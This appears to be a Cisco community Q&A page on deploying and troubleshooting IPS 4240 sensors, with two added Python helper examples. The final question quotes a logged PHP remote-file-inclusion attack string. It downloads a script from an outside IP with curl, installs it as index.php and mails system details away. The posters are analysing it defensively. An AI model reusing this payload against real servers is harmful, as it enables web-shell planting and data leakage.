Deployment of Cisco IPS 4240 devices

I can't find complete information about mass deployments of Cisco IPS 4240 devices. I have 6 devices which I intend to drive out to several remote sites and tie into a centralized Cisco MARS unit. Without the help of any CSM/LMS software, is there a quick and dirty way to pull this off? I am thinking of setting up a single IPS appliance, then pulling and distributing its configuration file to the remaining devices. I would like to hear how others have done this...

If all of your sensors are of the same type (all 4240s in your situation) and will all run the exact same configuration, then the copy command will help you out.

There is a new feature added to the copy command in IPS 6.1 which will help you when copying the config of one sensor to another.

Completely configure one sensor (using IME, IDM or the CLI). When you are satisfied with the configuration, use the copy command to copy it to an SCP server.

Now bring up a second sensor and configure basic networking through the setup settings (IP address, gateway, etc.).

Now use the copy command to copy the first sensor's configuration from the SCP server into the running configuration on the second sensor.

It will ask you whether to change the network settings on the second sensor.

Answer no.

The rest of the first sensor's configuration will be copied onto the second sensor.

The second sensor will keep its own unique IP address but gain the rest of the configuration from the first sensor's config.

Continue to do this with the additional sensors.

The process can then be repeated every time additional changes are made to the first sensor.

Remember though that this only works if the sensor configuration will be exactly duplicated (including which interfaces are monitored and how).

If each sensor will have some unique tunings, then you need to manage each sensor on its own or buy CSM, which can be used to share only parts of the configuration across multiple sensors.
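One way to verify the caveat in that answer after each copy round, as an added example that is not from the thread or from Cisco: pull each sensor's config back and compare it against the golden config, ignoring only the network-settings sub-block under service host that the copy command leaves alone. The config layout, the PER_SENSOR_BLOCK marker and the sample configs are assumptions constructed for this example.

```python
from typing import Dict, List, Set, Tuple

# Sub-block the copy command leaves untouched when you answer "no" (assumed).
PER_SENSOR_BLOCK = ("host", "network-settings")

def service_blocks(config: str) -> Dict[str, List[str]]:
    """Split an IPS CLI config into {service name: [setting lines]}; assumes
    'service <name>' opens each block and network-settings nests no block."""
    blocks: Dict[str, List[str]] = {}
    current, skipping = None, False
    for raw in config.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue                                # blank or comment line
        if line.startswith("service "):
            current, skipping = line[len("service "):], False
            blocks[current] = []
            continue
        if current is None or skipping:
            skipping = skipping and line != "exit"  # drop up to the block's exit
            continue
        if (current, line) == PER_SENSOR_BLOCK:
            skipping = True                         # per-sensor by design: ignore
        elif line != "exit":
            blocks[current].append(line)
    return blocks

def config_drift(golden: str, sensor: str) -> Dict[str, Set[Tuple[str, str]]]:
    """Settings found only in the golden config and only on the sensor."""
    g = {(svc, ln) for svc, lines in service_blocks(golden).items() for ln in lines}
    s = {(svc, ln) for svc, lines in service_blocks(sensor).items() for ln in lines}
    return {"missing_on_sensor": g - s, "extra_on_sensor": s - g}

# Constructed sample configs (not pulled from a real sensor).
GOLDEN = """\
service host
network-settings
host-ip 10.1.1.10/24,10.1.1.1
host-name ips-site-a
exit
exit
service signature-definition sig0
signatures 2004 0
status
enabled true
exit
exit
exit
"""
SENSOR_B = GOLDEN.replace("10.1.1.10/24,10.1.1.1", "10.2.2.10/24,10.2.2.1").replace("ips-site-a", "ips-site-b")
SENSOR_C = SENSOR_B.replace("enabled true", "enabled false")   # one tuning differs
```

An empty drift for a sensor means it only differs in its own network settings, which is the state the answer above relies on.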

Tags: Cisco Security

Similar Questions

  • TLS extensions not fully supported in Cisco IPS 4240

    I am trying to contact a Cisco IPS 4240 device while having FIPS security settings enabled on the client using SSL. This is not possible because the device does not support the TLS extensions in the Client Hello packet (RFC 5746) sent by the client when using TLS (SSL3 and lower are not FIPS compatible). The IDM application that communicates with the device does not send these extensions (I'm seeing this with Wireshark) and is able to connect to it.

    Is it possible to give the 4240 support for these TLS extensions?

    This is related to the bugs below.  The initial fix will be included in the 7.1.5 release, which will support the 4240 platform among others.  This will allow the IPS web server to ignore the extensions in the short term.  The long-term solution will require an update to the web server so that it is fully compliant with RFC 5746.

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtt18382

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtx43502

    Todd

  • SSL Session Key Recovery v1 in Cisco IPS

    Hi all

    In a network audit, I have the comment below from the auditor for a Cisco IPS 4270 device, but I don't have any solution for it. Kindly help me out on this.

    V1 SSL Session Key Recovery

    The remote SSH daemon supports connections made using version 1.33 or 1.5 of the SSH protocol. These protocols are not completely cryptographically safe so they should not be used.

    With respect,

    Sashi

    Currently there is no way to only allow SSH version 2 and disable SSH version 1 on IPS.

    Here is the enhancement request which has been filed, for your reference: CSCsk84977

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsk84977

    Hope that answers your question.
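Since the sensor cannot disable protocol 1, the practical follow-up is to inventory which management addresses still advertise it. This added example (not from the thread or from Cisco) classifies the SSH identification string per RFC 4253 section 5.1, where a "SSH-1.99" prefix means the server also accepts protocol 1 clients; the read_banner helper and the sample banners are constructed for this example.

```python
import socket

def ssh_protocol_support(banner: str) -> str:
    """Classify an SSH server identification string (RFC 4253 section 5.1).
    'SSH-1.99-...' advertises protocol 1 and 2, 'SSH-1.x-...' is v1 only,
    'SSH-2.0-...' is v2 only."""
    banner = banner.strip()
    if not banner.startswith("SSH-"):
        return "not-ssh"
    proto = banner.split("-", 2)[1]
    if proto == "2.0":
        return "v2-only"
    if proto == "1.99":
        return "v1-and-v2"
    if proto.startswith("1."):
        return "v1-only"
    return "unknown"

def read_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Fetch the identification line from a live host (helper, not run by the test)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        with sock.makefile("rb") as f:
            for raw in f:                        # RFC 4253 allows other lines first
                line = raw.decode("ascii", "replace").strip()
                if line.startswith("SSH-"):
                    return line
    return ""

def hosts_still_offering_v1(banners: dict) -> list:
    """Management addresses whose banner still accepts protocol 1 clients."""
    return sorted(h for h, b in banners.items()
                  if ssh_protocol_support(b) in ("v1-only", "v1-and-v2"))

# Constructed sample banners keyed by sensor management address (not real captures).
SAMPLE_BANNERS = {
    "10.1.1.10": "SSH-1.99-OpenSSH_3.9p1",
    "10.1.1.11": "SSH-2.0-OpenSSH_7.4",
    "10.1.1.12": "SSH-1.5-ConstructedSensorBanner",
}
```

For a real sweep, replace SAMPLE_BANNERS with {addr: read_banner(addr) for addr in your_sensor_list} and feed the result to hosts_still_offering_v1.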

  • IPS 4240 high availability?

    Hello

    Can the 4240 run in HA mode?

    Or should I look at the 4255 if I need to work in HA mode?

    Kindly help me with this info... Thanks in advance.

    Kind regards
    RAM

    Just to add a little bit to Bob's response.  HA is possible, but as mentioned above, it is not HA as you would expect from a firewall; it requires significant network planning and is rather technical in nature.

    The best documentation I could find on HA designs is chapter 21, "Deploying Cisco IPS for High Availability and High Performance", of the CCNP Security IPS 642-627 Official Cert Guide, ISBN: 9780132372107.  It gets quite detailed and explains a large number of different methods.

    I was also able to find some information on this site, but it is at a higher level and does not provide as many options.

    https://www.NetworkWorld.com/community/node/18384

    I have had to make HA work in some of our environments, and I'm here to tell you: plan ahead, far in advance, and test several methods to find one that suits.  We were using a method that I just couldn't find mentioned anywhere.

  • Cisco IPS automatic signature update link?

    Hi all
    I would like to know what address or link we need so that the IPS-4240 automatically updates its signatures from Cisco.
    In our setup the IPS shows this link. Is this correct?
    Thank you.
    Kind regards
    Budy

    Yes, a link like the following should work

    https://www.Cisco.com/cgi-bin/front.x/IDA/Locator/Locator.pl

    Regards

    Farrukh

  • Cisco IPS 4200 Signature Update

    We are currently evaluating and implementing the Cisco IPS solution for our security needs.

    Our supplier has said that 'online' signature updates for Cisco IPS are not possible - this is a manual process and we need to load the files onto the device if we want to update them.

    Somehow, this defies logic. Surely, I think, any IPS should be able to obtain updated signatures "online".

    I apologize if this question is too basic in nature. But could someone shed more light on this?

    Thank you.

    You have auto update functionality as of Cisco IPS version 6.0; take a look at the attached picture.

    After a signature update it is *recommended* that you reload the signatures (restart the sensor), although this is not mandatory.

    Our IPS has not been restarted for over two months now and everything is working ok.


  • IPS-4240 design question

    I have two IPS 4240s that can be placed between our internal network and our extranet firewall. The firewall set is a standard active/standby ASA-5520 pair connected to both switches.

    Q1 - If I'm not worried about atomic attacks, is there any other advantage of IPS inline over promiscuous?

    Q2 - Whether inline or promiscuous, is it necessary to connect a single IPS to both switches in order to receive packets when an ASA failover occurs? If so, physically or through RSPAN?

    Q3 - If the IPS fails and it is set up inline, do the interfaces fail open (traffic continues to pass) or closed (traffic is dropped)? I couldn't find that on the Cisco site.

    Thank you!

    In "promiscuous" mode you can use one 4240 and span the output of each switch to two of the 4240's sensing interfaces (it has four available). A single 4240 should even be able to track TCP sessions that span both paths, as in the case of a failover.

  • IPS-4240 E3 to E4 engine upgrade procedure

    Hi all

    Can someone help me upgrade the IPS from 6.0(1) E1 to 7.0(2) E4?

    Which images need to be installed for this?

    What is the appropriate upgrade procedure?

    Here is the version for your reference results show...

    ========================================

    Cisco IPS #.

    Cisco-IPS # sh ver
    Application partition:

    Cisco Intrusion Prevention System, Version 1.0000 E3

    Host:
    Domain keys key1.0
    Definition of signature:
    Update of the signing S479.0 2010-03-19
    Virus update V1.4 2007-03-02
    OS version: 2.4.30 - IDS-smp-bigphys
    Platform: IPS-4240-K9
    Serial number: JMX1244L0PK
    License expires: December 31, 2010 UTC
    Sensor time is 211 days.
    With the help of 1439252480 of 1984552960 memory available bytes (72% of use)
    the application data uses 44.0 M off 166,8 M bytes of disk space available (28% of use)
    startup is using 39.7 M off 68.6 M bytes of disk space available (61% of use)

    MainApp to E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500 Running
    AnalysisEngine-E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500 Running
    CLI-E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500

    Upgrade history:

    * IPS - GIS - S465 - req - E3 23:00:43 UTC Thursday, January 28, 2010
    IPS-GIS-S479-req - E3.pkg 00:05:37 UTC Wednesday, April 7, 2010

    Version 1.1 - 1, 0000 E3 recovery partition

    Valid certificate from the host: November 17, 2008 to November 18, 2010

    Cisco IPS #.

    Cisco IPS #.

    =================================

    Kind regards

    Anuj Pratap

    No, do not reimage the system (IPS-4240-K9-sys-1.1-a-7.0-2-E4.img), which would wipe out all of your configuration.

    Just perform the upgrade using this upgrade file: IPS-K9-7.0-2-E4.pkg, and it will automatically be updated to 7.0(2) E4.

  • IPS-4240 fail open

    Hi all

    I have one IPS-4240 unit. I want to know if, when my sensor or the unit itself fails / stops, there is an option where my traffic will still be passed so that there is no downtime.

    Thank you

    Pratik

    When the sensor is inline you can configure it with inline bypass mode 'auto', so when the unit is not working it will just pass traffic through without inspection. However, if the sensor is completely shut down, then no, the traffic will be dropped when in inline mode.

    Here is more information on inline bypass mode:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/CLI/cli_interfaces.html#wp1047079

    However, if it is in promiscuous mode, then you don't have to worry about this because the unit is not "inline" and will cause no disruption.

    Hope that helps.

  • 100% CPU use on Cisco IPS 4270...

    Hi people, I have a Cisco IPS 4270 version 7.0(2) E3. When I try to access it through IDM it shows cpu1 = 100% and cpu4 = 100%, but cpu1 and cpu2 vary. Can you please tell me what the solution to this problem would be...

    When I try to go to the configuration it gives me an error... document attached, please check...

    Hello

    Having 100% on some of your CPUs is normal on the IPS platform.

    The device uses idle cycles to prepare for handling incoming packets and to reduce the delay it introduces on their path, so this is expected even under low load.

    If you want to get a better idea of what percentage of your IPS capacity you are currently using, you should have a look at the Inspection Load value. Looking at the data you have provided, you are at about 25% at present.

    For the rdep timeout message, it seems to be a software problem. Looking more closely at the image you attached, you can also see "analysis engine status: no answer".

    It is somewhat difficult to troubleshoot those on CSC, so I suggest pursuing this with TAC if you want to know the exact root cause.

    What I advise is upgrading to the latest 7.0 code, which I believe is 7.0(5a) E4, since it is more than likely fixed in this version.

    If you are looking for a quick fix, a reboot of the IPS should clear this, but the problem will more than likely return later.

    Kind regards

    Nicolas

  • IPS two devices with the same UUID

    I have two Sourcefire\Cisco IPS sensors deployed which have been identified as having the same UUID. As you can imagine, this is causing all sorts of issues. Has this ever been seen before, and if so is there a solution?

    -------------------[ SENSOR 1]--------------------

    Model: 3D7120 (63) Version 5.4.0.4 (Build 55)

    UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e

    Version VDB: 258

    ----------------------------------------------------

    ------------------[ SENSOR 2]-----------------

    Model: 3D7120 (63) Version 5.4.0.4 (Build 55)

    UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e

    Version VDB: 258

    ----------------------------------------------------

    I've not seen this before.

    I guess you will have to remove the two sensors, reinstall their software and add them back to the Management Center.

  • Upgrade version of CISCO IPS signature

    Hi guys:

    Does anyone know the process for updating the signature version on a Cisco IPS? I want to do it manually. If somebody can tell me the commands and everything I have to do for this.

    Regards

    Luis;

    Manual signature updates for Cisco IPS sensors can be performed from the CLI as shown here:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/CLI/cli_system_images.html#wp1142504

    Or from the IDM interface as shown here:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/IDM/idm_sensor_management.html#wp2126670

    This process is also used to upgrade the base software of the sensor.

    Scott

  • IPS 4240 - additional card

    Hello

    Does anyone know when the 4xFE cards for the IPS-4240 (for a total of 8 interfaces) will be available?

    Kind regards

    Krzysztof

    The option card for the IPS-4240/4255 sensors will be a 4GE card supporting copper (RJ45) and fiber (SX) connections. It will allow a total of 8 RJ45 interfaces, or 4 SX fiber interfaces (plus 4 RJ45 interfaces), on these platforms. Unfortunately, it will probably not be available for another 9 months or more.

  • List of Cisco IPS Signatures

    Hi guys,

    I need a complete list of Cisco IPS signatures in PDF.

    Can someone help me find a link or a PDF?

    Thank you all,

    JV

    Hello

    I couldn't find any method to export the list of signatures. This could be because there are thousands of them.

    However, you can use the following link to find signature details.

    http://Tools.Cisco.com/Security/Center/home.x

    SPSP

  • PHP exploit triggers Cisco Security Agent but NOT Cisco IPS... why?

    Does anyone know which signature this exploit should trigger on the Cisco IPS sensor? We are not sure if there is one, or if we turned it off.

    We see this exploit hit our Exchange servers several times during the week.

    The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.

    I think this could be the Mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched MySDN for Mambo and found Sig 5163 "Mambo Site Server Administration Password ByPass"; here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS could not have seen this since it was over 443.

    Hope this helps

    M
